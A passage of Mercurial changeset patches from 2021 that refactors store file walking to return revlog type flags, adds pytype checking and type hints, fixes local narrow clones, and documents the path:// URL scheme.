encoded, size) + yields (file_type, unencoded, encoded, size) if a matcher is passed, storage files of only those tracked paths are passed with matches the matcher @@ -500,14 +541,14 @@ self.opener = self.vfs def datafiles(self, matcher=None): - for a, b, size in super(encodedstore, self).datafiles(): + for t, a, b, size in super(encodedstore, self).datafiles(): try: a = decodefilename(a) except KeyError: a = None if a is not None and not _matchtrackedpath(a, matcher): continue - yield a, b, size + yield t, a, b, size def join(self, f): return self.path + b'/' + encodefilename(f) @@ -696,7 +737,9 @@ continue ef = self.encode(f) try: - yield f, ef, self.getsize(ef) + t = revlog_type(f) + t |= FILEFLAGS_FILELOG + yield t, f, ef, self.getsize(ef) except OSError as err: if err.errno != errno.ENOENT: raise diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -243,7 +243,7 @@ # Get consistent snapshot of repo, lock during scan. with repo.lock(): repo.ui.debug(b'scanning\n') - for name, ename, size in _walkstreamfiles(repo): + for file_type, name, ename, size in _walkstreamfiles(repo): if size: entries.append((name, size)) total_bytes += size @@ -616,7 +616,7 @@ matcher = narrowspec.match(repo.root, includes, excludes) repo.ui.debug(b'scanning\n') - for name, ename, size in _walkstreamfiles(repo, matcher): + for rl_type, name, ename, size in _walkstreamfiles(repo, matcher): if size: entries.append((_srcstore, name, _fileappend, size)) totalfilesize += size diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -192,7 +192,7 @@ # Perform a pass to collect metadata. This validates we can open all # source files and allows a unified progress bar to be displayed. - for unencoded, encoded, size in alldatafiles: + for revlog_type, unencoded, encoded, size in alldatafiles: if not unencoded.endswith(b'.i'): continue diff --git a/mercurial/verify.py b/mercurial/verify.py --- a/mercurial/verify.py +++ b/mercurial/verify.py @@ -416,7 +416,7 @@ storefiles = set() subdirs = set() revlogv1 = self.revlogv1 - for f, f2, size in repo.store.datafiles(): + for t, f, f2, size in repo.store.datafiles(): if not f: self._err(None, _(b"cannot decode filename '%s'") % f2) elif (size > 0 or not revlogv1) and f.startswith(b'meta/'): @@ -480,7 +480,7 @@ ui.status(_(b"checking files\n")) storefiles = set() - for f, f2, size in repo.store.datafiles(): + for rl_type, f, f2, size in repo.store.datafiles(): if not f: self._err(None, _(b"cannot decode filename '%s'") % f2) elif (size > 0 or not revlogv1) and f.startswith(b'data/'): diff --git a/mercurial/wireprotov2server.py b/mercurial/wireprotov2server.py --- a/mercurial/wireprotov2server.py +++ b/mercurial/wireprotov2server.py @@ -1582,7 +1582,8 @@ # TODO this is a bunch of storage layer interface abstractions because # it assumes revlogs. - for name, encodedname, size in topfiles: + for rl_type, name, encodedname, size in topfiles: + # XXX use the `rl_type` for that if b'changelog' in files and name.startswith(b'00changelog'): pass elif b'manifestlog' in files and name.startswith(b'00manifest'): diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -754,15 +754,15 @@ $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) - adding [s] 00manifest.i (313 KB) adding [s] 00manifest.d (452 KB) (no-zstd !) adding [s] 00manifest.d (491 KB) (zstd !) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) - adding [s] 00changelog.i (313 KB) adding [s] 00changelog.d (360 KB) (no-zstd !) adding [s] 00changelog.d (368 KB) (zstd !) adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) $ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698291 -7200 # Tue Apr 06 10:38:11 2021 +0200 # Node ID cf49e54ef965c44332ebb51f2c0691e8da396e16 # Parent 6085b7f1536dbb3e9375907235e6a7a56af6004f upgrade: take advantage of the new information returned by `store.walk` Before this change the upgrade code had to analyse filename to process them directly. Lets keep that logic private to the store and more to a more robust explicit approach. Differential Revision: https://phab.mercurial-scm.org/D10316 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -21,30 +21,34 @@ requirements, revlog, scmutil, + store, util, vfs as vfsmod, ) from ..revlogutils import nodemap -def _revlogfrompath(repo, path): +def _revlogfrompath(repo, rl_type, path): """Obtain a revlog from a repo path. An instance of the appropriate class is returned. """ - if path == b'00changelog.i': + if rl_type & store.FILEFLAGS_CHANGELOG: return changelog.changelog(repo.svfs) - elif path.endswith(b'00manifest.i'): - mandir = path[: -len(b'00manifest.i')] + elif rl_type & store.FILEFLAGS_MANIFESTLOG: + mandir = b'' + if b'/' in path: + mandir = path.rsplit(b'/', 1)[0] return manifest.manifestrevlog( repo.nodeconstants, repo.svfs, tree=mandir ) else: - # reverse of "/".join(("data", path + ".i")) - return filelog.filelog(repo.svfs, path[5:-2]) + # drop the extension and the `data/` prefix + path = path.rsplit(b'.', 1)[0].split(b'/', 1)[1] + return filelog.filelog(repo.svfs, path) -def _copyrevlog(tr, destrepo, oldrl, unencodedname): +def _copyrevlog(tr, destrepo, oldrl, rl_type, unencodedname): """copy all relevant files for `oldrl` into `destrepo` store Files are copied "as is" without any transformation. The copy is performed @@ -52,7 +56,7 @@ content is compatible with format of the destination repository. """ oldrl = getattr(oldrl, '_revlog', oldrl) - newrl = _revlogfrompath(destrepo, unencodedname) + newrl = _revlogfrompath(destrepo, rl_type, unencodedname) newrl = getattr(newrl, '_revlog', newrl) oldvfs = oldrl.opener @@ -70,10 +74,7 @@ if copydata: util.copyfile(olddata, newdata) - if not ( - unencodedname.endswith(b'00changelog.i') - or unencodedname.endswith(b'00manifest.i') - ): + if rl_type & store.FILEFLAGS_FILELOG: destrepo.svfs.fncache.add(unencodedname) if copydata: destrepo.svfs.fncache.add(unencodedname[:-2] + b'.d') @@ -107,17 +108,18 @@ return sidedatacompanion -def matchrevlog(revlogfilter, entry): +def matchrevlog(revlogfilter, rl_type): """check if a revlog is selected for cloning. In other words, are there any updates which need to be done on revlog or it can be blindly copied. The store entry is checked against the passed filter""" - if entry.endswith(b'00changelog.i'): + if rl_type & store.FILEFLAGS_CHANGELOG: return UPGRADE_CHANGELOG in revlogfilter - elif entry.endswith(b'00manifest.i'): + elif rl_type & store.FILEFLAGS_MANIFESTLOG: return UPGRADE_MANIFEST in revlogfilter + assert rl_type & store.FILEFLAGS_FILELOG return UPGRADE_FILELOGS in revlogfilter @@ -126,6 +128,7 @@ dstrepo, tr, old_revlog, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -133,11 +136,11 @@ ): """ returns the new revlog object created""" newrl = None - if matchrevlog(upgrade_op.revlogs_to_process, unencoded): + if matchrevlog(upgrade_op.revlogs_to_process, rl_type): ui.note( _(b'cloning %d revisions from %s\n') % (len(old_revlog), unencoded) ) - newrl = _revlogfrompath(dstrepo, unencoded) + newrl = _revlogfrompath(dstrepo, rl_type, unencoded) old_revlog.clone( tr, newrl, @@ -149,9 +152,9 @@ else: msg = _(b'blindly copying %s containing %i revisions\n') ui.note(msg % (unencoded, len(old_revlog))) - _copyrevlog(tr, dstrepo, old_revlog, unencoded) + _copyrevlog(tr, dstrepo, old_revlog, rl_type, unencoded) - newrl = _revlogfrompath(dstrepo, unencoded) + newrl = _revlogfrompath(dstrepo, rl_type, unencoded) return newrl @@ -192,11 +195,11 @@ # Perform a pass to collect metadata. This validates we can open all # source files and allows a unified progress bar to be displayed. - for revlog_type, unencoded, encoded, size in alldatafiles: - if not unencoded.endswith(b'.i'): + for rl_type, unencoded, encoded, size in alldatafiles: + if not rl_type & store.FILEFLAGS_REVLOG_MAIN: continue - rl = _revlogfrompath(srcrepo, unencoded) + rl = _revlogfrompath(srcrepo, rl_type, unencoded) info = rl.storageinfo( exclusivefiles=True, @@ -213,19 +216,19 @@ srcrawsize += rawsize # This is for the separate progress bars. - if isinstance(rl, changelog.changelog): - changelogs[unencoded] = rl + if rl_type & store.FILEFLAGS_CHANGELOG: + changelogs[unencoded] = (rl_type, rl) crevcount += len(rl) csrcsize += datasize crawsize += rawsize - elif isinstance(rl, manifest.manifestrevlog): - manifests[unencoded] = rl + elif rl_type & store.FILEFLAGS_MANIFESTLOG: + manifests[unencoded] = (rl_type, rl) mcount += 1 mrevcount += len(rl) msrcsize += datasize mrawsize += rawsize - elif isinstance(rl, filelog.filelog): - filelogs[unencoded] = rl + elif rl_type & store.FILEFLAGS_FILELOG: + filelogs[unencoded] = (rl_type, rl) fcount += 1 frevcount += len(rl) fsrcsize += datasize @@ -270,12 +273,13 @@ ) ) progress = srcrepo.ui.makeprogress(_(b'file revisions'), total=frevcount) - for unencoded, oldrl in sorted(filelogs.items()): + for unencoded, (rl_type, oldrl) in sorted(filelogs.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -309,12 +313,13 @@ progress = srcrepo.ui.makeprogress( _(b'manifest revisions'), total=mrevcount ) - for unencoded, oldrl in sorted(manifests.items()): + for unencoded, (rl_type, oldrl) in sorted(manifests.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -347,12 +352,13 @@ progress = srcrepo.ui.makeprogress( _(b'changelog revisions'), total=crevcount ) - for unencoded, oldrl in sorted(changelogs.items()): + for unencoded, (rl_type, oldrl) in sorted(changelogs.items()): newrl = _perform_clone( ui, dstrepo, tr, oldrl, + rl_type, unencoded, upgrade_op, sidedatacompanion, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698307 -7200 # Tue Apr 06 10:38:27 2021 +0200 # Node ID 1c52d77d7861e5d3d90fe07e2236338c56109f76 # Parent cf49e54ef965c44332ebb51f2c0691e8da396e16 upgrade: do not hardcore file extension of revlogs This logic already lives inside the `store` module. So lets reuse it instead. Differential Revision: https://phab.mercurial-scm.org/D10317 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -390,7 +390,7 @@ are cloned""" for path, kind, st in sorted(srcrepo.store.vfs.readdir(b'', stat=True)): # don't copy revlogs as they are already cloned - if path.endswith((b'.i', b'.d', b'.n', b'.nd')): + if store.revlog_type(path) is not None: continue # Skip transaction related files. if path.startswith(b'undo'): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616128586 14400 # Fri Mar 19 00:36:26 2021 -0400 # Node ID e1d75c514ceda28cced27fee948084f0279a4c93 # Parent 1c52d77d7861e5d3d90fe07e2236338c56109f76 tests: add a (very slow) test that executes pytype This is an updated form of D7295, and completes successfully with pytype 2021.03.22. The 5 or so crashes that were mostly in the hgweb files seems to have been fixed in 2021.03.10. Differential Revision: https://phab.mercurial-scm.org/D10237 diff --git a/tests/test-check-pytype.t b/tests/test-check-pytype.t new file mode 100644 --- /dev/null +++ b/tests/test-check-pytype.t @@ -0,0 +1,105 @@ +#require pytype py3 slow + + $ cd $RUNTESTDIR/.. + +Many of the individual files that are excluded here confuse pytype +because they do a mix of Python 2 and Python 3 things +conditionally. There's no good way to help it out with that as far as +I can tell, so let's just hide those files from it for now. We should +endeavor to empty this list out over time, as some of these are +probably hiding real problems. + +mercurial/bundlerepo.py # no vfs and ui attrs on bundlerepo +mercurial/changegroup.py # mysterious incorrect type detection +mercurial/chgserver.py # [attribute-error] +mercurial/cmdutil.py # No attribute 'markcopied' on mercurial.context.filectx [attribute-error] +mercurial/context.py # many [attribute-error] +mercurial/copies.py # No attribute 'items' on None [attribute-error] +mercurial/crecord.py # tons of [attribute-error], [module-attr] +mercurial/debugcommands.py # [wrong-arg-types] +mercurial/dispatch.py # initstdio: No attribute ... on TextIO [attribute-error] +mercurial/exchange.py # [attribute-error] +mercurial/hgweb/hgweb_mod.py # [attribute-error], [name-error], [wrong-arg-types] +mercurial/hgweb/server.py # [attribute-error], [name-error], [module-attr] +mercurial/hgweb/webcommands.py # [missing-parameter] +mercurial/hgweb/wsgicgi.py # confused values in os.environ +mercurial/httppeer.py # [attribute-error], [wrong-arg-types] +mercurial/interfaces # No attribute 'capabilities' on peer [attribute-error] +mercurial/keepalive.py # [attribute-error] +mercurial/localrepo.py # [attribute-error] +mercurial/lsprof.py # unguarded import +mercurial/manifest.py # [unsupported-operands], [wrong-arg-types] +mercurial/minirst.py # [unsupported-operands], [attribute-error] +mercurial/patch.py # [wrong-arg-types] +mercurial/pure/osutil.py # [invalid-typevar], [not-callable] +mercurial/pure/parsers.py # [attribute-error] +mercurial/pycompat.py # bytes vs str issues +mercurial/repoview.py # [attribute-error] +mercurial/sslutil.py # [attribute-error] +mercurial/statprof.py # bytes vs str on TextIO.write() [wrong-arg-types] +mercurial/testing/storage.py # tons of [attribute-error] +mercurial/ui.py # [attribute-error], [wrong-arg-types] +mercurial/unionrepo.py # ui, svfs, unfiltered [attribute-error] +mercurial/upgrade.py # line 84, in upgraderepo: No attribute 'discard' on Dict[nothing, nothing] [attribute-error] +mercurial/util.py # [attribute-error], [wrong-arg-count] +mercurial/utils/procutil.py # [attribute-error], [module-attr], [bad-return-type] +mercurial/utils/stringutil.py # [module-attr], [wrong-arg-count] +mercurial/utils/memorytop.py # not 3.6 compatible +mercurial/win32.py # [not-callable] +mercurial/wireprotoframing.py # [unsupported-operands], [attribute-error], [import-error] +mercurial/wireprotoserver.py # line 253, in _availableapis: No attribute '__iter__' on Callable[[Any, Any], Any] [attribute-error] +mercurial/wireprotov1peer.py # [attribute-error] +mercurial/wireprotov1server.py # BUG?: BundleValueError handler accesses subclass's attrs +mercurial/wireprotov2server.py # [unsupported-operands], [attribute-error] + +TODO: use --no-cache on test server? Caching the files locally helps during +development, but may be a hinderance for CI testing. + + $ pytype -V 3.6 --keep-going --jobs auto mercurial \ + > -x mercurial/bundlerepo.py \ + > -x mercurial/changegroup.py \ + > -x mercurial/chgserver.py \ + > -x mercurial/cmdutil.py \ + > -x mercurial/context.py \ + > -x mercurial/copies.py \ + > -x mercurial/crecord.py \ + > -x mercurial/debugcommands.py \ + > -x mercurial/dispatch.py \ + > -x mercurial/exchange.py \ + > -x mercurial/hgweb/hgweb_mod.py \ + > -x mercurial/hgweb/server.py \ + > -x mercurial/hgweb/webcommands.py \ + > -x mercurial/hgweb/wsgicgi.py \ + > -x mercurial/httppeer.py \ + > -x mercurial/interfaces \ + > -x mercurial/keepalive.py \ + > -x mercurial/localrepo.py \ + > -x mercurial/lsprof.py \ + > -x mercurial/manifest.py \ + > -x mercurial/minirst.py \ + > -x mercurial/patch.py \ + > -x mercurial/pure/osutil.py \ + > -x mercurial/pure/parsers.py \ + > -x mercurial/pycompat.py \ + > -x mercurial/repoview.py \ + > -x mercurial/sslutil.py \ + > -x mercurial/statprof.py \ + > -x mercurial/testing/storage.py \ + > -x mercurial/thirdparty \ + > -x mercurial/ui.py \ + > -x mercurial/unionrepo.py \ + > -x mercurial/upgrade.py \ + > -x mercurial/util.py \ + > -x mercurial/utils/procutil.py \ + > -x mercurial/utils/stringutil.py \ + > -x mercurial/utils/memorytop.py \ + > -x mercurial/win32.py \ + > -x mercurial/wireprotoframing.py \ + > -x mercurial/wireprotoserver.py \ + > -x mercurial/wireprotov1peer.py \ + > -x mercurial/wireprotov1server.py \ + > -x mercurial/wireprotov2server.py \ + > > $TESTTMP/pytype-output.txt || cat $TESTTMP/pytype-output.txt + +Only show the results on a failure, because the output on success is also +voluminous and variable. # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616713154 14400 # Thu Mar 25 18:59:14 2021 -0400 # Node ID 8b6e36e4b553fa382fd46b654e2e6c8d327770c7 # Parent e1d75c514ceda28cced27fee948084f0279a4c93 typing: add type hints to mercurial/error.py The only slightly unusual things here are that `location` is passed to `ParseError` and both bytes and an int (so this accepts both), and the message passed `ProgrammingError` is immediately converted to str. Therefore it is typed as `AnyStr`, because there are a couple of instances that are already passed as str. There are a couple of places where bytes are being passed to builtin exceptions that might need to be converted to str. Differential Revision: https://phab.mercurial-scm.org/D10274 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -20,7 +20,13 @@ if pycompat.TYPE_CHECKING: from typing import ( + Any, + AnyStr, + Iterable, + List, Optional, + Sequence, + Union, ) @@ -109,6 +115,7 @@ """Exception raised on errors in parsing the command line.""" def __init__(self, command, message): + # type: (bytes, bytes) -> None self.command = command self.message = message super(CommandError, self).__init__() @@ -120,6 +127,7 @@ """Exception raised if command is not in the command table.""" def __init__(self, command, all_commands=None): + # type: (bytes, Optional[List[bytes]]) -> None self.command = command self.all_commands = all_commands super(UnknownCommand, self).__init__() @@ -131,6 +139,7 @@ """Exception raised if command shortcut matches more than one command.""" def __init__(self, prefix, matches): + # type: (bytes, List[bytes]) -> None self.prefix = prefix self.matches = matches super(AmbiguousCommand, self).__init__() @@ -142,6 +151,7 @@ """Exception raised when a worker process dies.""" def __init__(self, status_code): + # type: (int) -> None self.status_code = status_code # Pass status code to superclass just so it becomes part of __bytes__ super(WorkerError, self).__init__(status_code) @@ -159,6 +169,7 @@ """Exception raised when a continuable command required merge conflict resolution.""" def __init__(self, opname): + # type: (bytes) -> None from .i18n import _ self.opname = opname @@ -194,6 +205,7 @@ return pycompat.sysstr(self.__bytes__()) def format(self): + # type: () -> bytes from .i18n import _ message = _(b"abort: %s\n") % self.message @@ -247,10 +259,12 @@ """Exception raised when parsing config files""" def __init__(self, message, location=None, hint=None): + # type: (bytes, Optional[bytes], Optional[bytes]) -> None super(ConfigError, self).__init__(message, hint=hint) self.location = location def format(self): + # type: () -> bytes from .i18n import _ if self.location is not None: @@ -300,10 +314,12 @@ """Raised when parsing config files and {rev,file}sets (msg[, pos])""" def __init__(self, message, location=None, hint=None): + # type: (bytes, Optional[Union[bytes, int]], Optional[bytes]) -> None super(ParseError, self).__init__(message, hint=hint) self.location = location def format(self): + # type: () -> bytes from .i18n import _ if self.location is not None: @@ -323,6 +339,7 @@ def getsimilar(symbols, value): + # type: (Iterable[bytes], bytes) -> List[bytes] sim = lambda x: difflib.SequenceMatcher(None, value, x).ratio() # The cutoff for similarity here is pretty arbitrary. It should # probably be investigated and tweaked. @@ -330,6 +347,7 @@ def similarity_hint(similar): + # type: (List[bytes]) -> Optional[bytes] from .i18n import _ if len(similar) == 1: @@ -345,6 +363,7 @@ """Exception raised when a {rev,file}set references an unknown identifier""" def __init__(self, function, symbols): + # type: (bytes, Iterable[bytes]) -> None from .i18n import _ similar = getsimilar(symbols, function) @@ -379,6 +398,7 @@ """Raised if I/O to stdout or stderr fails""" def __init__(self, err): + # type: (IOError) -> None IOError.__init__(self, err.errno, err.strerror) # no __bytes__() because error message is derived from the standard IOError @@ -386,6 +406,7 @@ class UnsupportedMergeRecords(Abort): def __init__(self, recordtypes): + # type: (Iterable[bytes]) -> None from .i18n import _ self.recordtypes = sorted(recordtypes) @@ -404,12 +425,15 @@ """generic exception for aborting from an encounter with an unknown version""" def __init__(self, msg, hint=None, version=None): + # type: (bytes, Optional[bytes], Optional[bytes]) -> None self.version = version super(UnknownVersion, self).__init__(msg, hint=hint) class LockError(IOError): def __init__(self, errno, strerror, filename, desc): + # TODO: figure out if this should be bytes or str + # _type: (int, str, str, bytes) -> None IOError.__init__(self, errno, strerror, filename) self.desc = desc @@ -456,6 +480,7 @@ """Raised if a mercurial (core or extension) developer made a mistake""" def __init__(self, msg, *args, **kwargs): + # type: (AnyStr, Any, Any) -> None # On Python 3, turn the message back into a string since this is # an internal-only error that won't be printed except in a # stack traces. @@ -499,7 +524,7 @@ entries.append(b"%s=%r" % (par, pycompat.maybebytestr(val))) if entries: msg = b'%s - %s' % (msg, b', '.join(entries)) - ValueError.__init__(self, msg) + ValueError.__init__(self, msg) # TODO: convert to str? class ReadOnlyPartError(RuntimeError): @@ -533,6 +558,7 @@ """ def __init__(self, filename, node, tombstone): + # type: (bytes, bytes, bytes) -> None from .node import short StorageError.__init__(self, b'%s:%s' % (filename, short(node))) @@ -588,5 +614,6 @@ """ def __init__(self, message, args=None): + # type: (bytes, Optional[Sequence[bytes]]) -> None self.message = message self.messageargs = args # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616718120 14400 # Thu Mar 25 20:22:00 2021 -0400 # Node ID 64400d05db1e91dd8e79af85306355dd08178af4 # Parent 8b6e36e4b553fa382fd46b654e2e6c8d327770c7 util: fix the signature for the pypy override of sortdict.update() PyCharm flagged this as not matching the base class signature. Not sure if there was anything supplying these extra arguments though. Differential Revision: https://phab.mercurial-scm.org/D10275 diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1296,11 +1296,13 @@ if pycompat.ispypy: # __setitem__() isn't called as of PyPy 5.8.0 - def update(self, src): + def update(self, src, **f): if isinstance(src, dict): src = pycompat.iteritems(src) for k, v in src: self[k] = v + for k in f: + self[k] = f[k] def insert(self, position, key, value): for (i, (k, v)) in enumerate(list(self.items())): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616725781 14400 # Thu Mar 25 22:29:41 2021 -0400 # Node ID 51841b23670bbd659dfd9cc70bab27c325278ebe # Parent 64400d05db1e91dd8e79af85306355dd08178af4 typing: make minor adjustments to mercurial/util.py to pass pytype checking I'm assuming the wrong-arg-count is a pytype bug, because this code is used by the config object. Avoiding initializing `_lrucachenode` node points to None eliminates a few `is not None` assertions, but apparently not all of them. I can't figure out why it gets confused over the state where these new assertions are. Differential Revision: https://phab.mercurial-scm.org/D10276 diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1265,7 +1265,8 @@ """call this before writes, return self or a copied new object""" if getattr(self, '_copied', 0): self._copied -= 1 - return self.__class__(self) + # Function cow.__init__ expects 1 arg(s), got 2 [wrong-arg-count] + return self.__class__(self) # pytype: disable=wrong-arg-count return self def copy(self): @@ -1408,8 +1409,8 @@ __slots__ = ('next', 'prev', 'key', 'value', 'cost') def __init__(self): - self.next = None - self.prev = None + self.next = self + self.prev = self self.key = _notset self.value = None @@ -1448,9 +1449,7 @@ def __init__(self, max, maxcost=0): self._cache = {} - self._head = head = _lrucachenode() - head.prev = head - head.next = head + self._head = _lrucachenode() self._size = 1 self.capacity = max self.totalcost = 0 @@ -1555,6 +1554,7 @@ """ try: node = self._cache[k] + assert node is not None # help pytype return node.value except KeyError: if default is _notset: @@ -1612,6 +1612,9 @@ # Walk the linked list backwards starting at tail node until we hit # a non-empty node. n = self._head.prev + + assert n is not None # help pytype + while n.key is _notset: n = n.prev diff --git a/tests/test-check-pytype.t b/tests/test-check-pytype.t --- a/tests/test-check-pytype.t +++ b/tests/test-check-pytype.t @@ -89,7 +89,6 @@ > -x mercurial/ui.py \ > -x mercurial/unionrepo.py \ > -x mercurial/upgrade.py \ - > -x mercurial/util.py \ > -x mercurial/utils/procutil.py \ > -x mercurial/utils/stringutil.py \ > -x mercurial/utils/memorytop.py \ # HG changeset patch # User Charles Chamberlain <cchamberlain@janestreet.com> # Date 1618004508 14400 # Fri Apr 09 17:41:48 2021 -0400 # Node ID 631001150e136d8c35f08a6aa6742eee308c03fd # Parent 51841b23670bbd659dfd9cc70bab27c325278ebe narrow: add capabilities for local repos, not just remote peers This fixes the bug where running `hg clone --narrow ./local-repo` fails with abort: server does not support narrow clones even when the server has narrow enabled. Differential Revision: https://phab.mercurial-scm.org/D10357 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -73,6 +73,7 @@ txnutil, util, vfs as vfsmod, + wireprototypes, ) from .interfaces import ( @@ -1495,6 +1496,8 @@ bundle2.getrepocaps(self, role=b'client') ) caps.add(b'bundle2=' + urlreq.quote(capsblob)) + if self.ui.configbool(b'experimental', b'narrow'): + caps.add(wireprototypes.NARROWCAP) return caps # Don't cache auditor/nofsauditor, or you'll end up with reference cycle: diff --git a/tests/test-narrow-clone.t b/tests/test-narrow-clone.t --- a/tests/test-narrow-clone.t +++ b/tests/test-narrow-clone.t @@ -64,15 +64,17 @@ $ cd .. -BUG: local-to-local narrow clones should work, but don't. +local-to-local narrow clones work $ hg clone --narrow master narrow-via-localpeer --noupdate --include "dir/src/f10" requesting all changes - abort: server does not support narrow clones - [255] + adding changesets + adding manifests + adding file changes + added 3 changesets with 1 changes to 1 files + new changesets 5d21aaea77f8:26ce255d5b5d $ hg tracked -R narrow-via-localpeer - abort: repository narrow-via-localpeer not found - [255] + I path:dir/src/f10 $ rm -Rf narrow-via-localpeer narrow clone with a newline should fail diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -61,7 +61,7 @@ [255] Names with '.' in them are OK. - $ hg clone --narrow ssh://user@dummy/master should-work --include a/.b/c + $ hg clone --narrow ./master should-work --include a/.b/c requesting all changes adding changesets adding manifests # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618281767 14400 # Mon Apr 12 22:42:47 2021 -0400 # Node ID 856820b497fcf31b7904e0b160c318437581d0c0 # Parent 631001150e136d8c35f08a6aa6742eee308c03fd # Parent bc268ea9f9843d65586186c0c735001510dd1daf merge with stable diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -5,6 +5,9 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. +# See https://github.com/google/pytype/issues/860 +# pytype: skip-file + from __future__ import absolute_import from ..i18n import _ diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -2177,6 +2177,7 @@ return True +_re2_input = lambda x: x try: import re2 # pytype: disable=import-error @@ -2188,11 +2189,21 @@ class _re(object): def _checkre2(self): global _re2 + global _re2_input try: # check if match works, see issue3964 - _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]')) + check_pattern = br'\[([^\[]+)\]' + check_input = b'[ui]' + _re2 = bool(re2.match(check_pattern, check_input)) except ImportError: _re2 = False + except TypeError: + # the `pyre-2` project provides a re2 module that accept bytes + # the `fb-re2` project provides a re2 module that acccept sysstr + check_pattern = pycompat.sysstr(check_pattern) + check_input = pycompat.sysstr(check_input) + _re2 = bool(re2.match(check_pattern, check_input)) + _re2_input = pycompat.sysstr def compile(self, pat, flags=0): """Compile a regular expression, using re2 if possible @@ -2208,7 +2219,7 @@ if flags & remod.MULTILINE: pat = b'(?m)' + pat try: - return re2.compile(pat) + return re2.compile(_re2_input(pat)) except re2.error: pass return remod.compile(pat, flags) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618061290 -7200 # Sat Apr 10 15:28:10 2021 +0200 # Node ID ede52e19c752eeff69d4df8188413b0111a62f04 # Parent 856820b497fcf31b7904e0b160c318437581d0c0 help: point to `hg help urls` in `hg help config.paths` This seems useful to point at what people can put as value for these config. Differential Revision: https://phab.mercurial-scm.org/D10371 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1702,7 +1702,8 @@ These symbolic names can be used from the command line. To pull from ``my_server``: :hg:`pull my_server`. To push to ``local_path``: -:hg:`push local_path`. +:hg:`push local_path`. You can check :hg:`help urls` for details about +valid URLs. Options containing colons (``:``) denote sub-options that can influence behavior for that specific path. Example:: diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -1833,7 +1833,7 @@ These symbolic names can be used from the command line. To pull from "my_server": 'hg pull my_server'. To push to "local_path": 'hg push - local_path'. + local_path'. You can check 'hg help urls' for details about valid URLs. Options containing colons (":") denote sub-options that can influence behavior for that specific path. Example: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618061432 -7200 # Sat Apr 10 15:30:32 2021 +0200 # Node ID 95a5ed7db9cabe52bcf84599e017ec1bed63a290 # Parent ede52e19c752eeff69d4df8188413b0111a62f04 help: document the `path://` url scheme If we want people to use it, we need to document it. Differential Revision: https://phab.mercurial-scm.org/D10372 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1712,6 +1712,9 @@ my_server = https://example.com/my_path my_server:pushurl = ssh://example.com/my_path +Paths using the `path://otherpath` scheme will inherit the sub-options value from +the path they point to. + The following sub-options can be defined: ``pushurl`` diff --git a/mercurial/helptext/urls.txt b/mercurial/helptext/urls.txt --- a/mercurial/helptext/urls.txt +++ b/mercurial/helptext/urls.txt @@ -5,6 +5,7 @@ http://[user[:pass]@]host[:port]/[path][#revision] https://[user[:pass]@]host[:port]/[path][#revision] ssh://[user@]host[:port]/[path][#revision] + path://pathname Paths in the local filesystem can either point to Mercurial repositories or to bundle files (as created by :hg:`bundle` or @@ -64,3 +65,12 @@ default-push: The push command will look for a path named 'default-push', and prefer it over 'default' if both are defined. + +These alias can also be use in the `path://` scheme:: + + [paths] + alias1 = URL1 + alias2 = path://alias1 + ... + +check :hg:`help config.paths` for details about the behavior of such "sub-path". diff --git a/tests/test-help.t 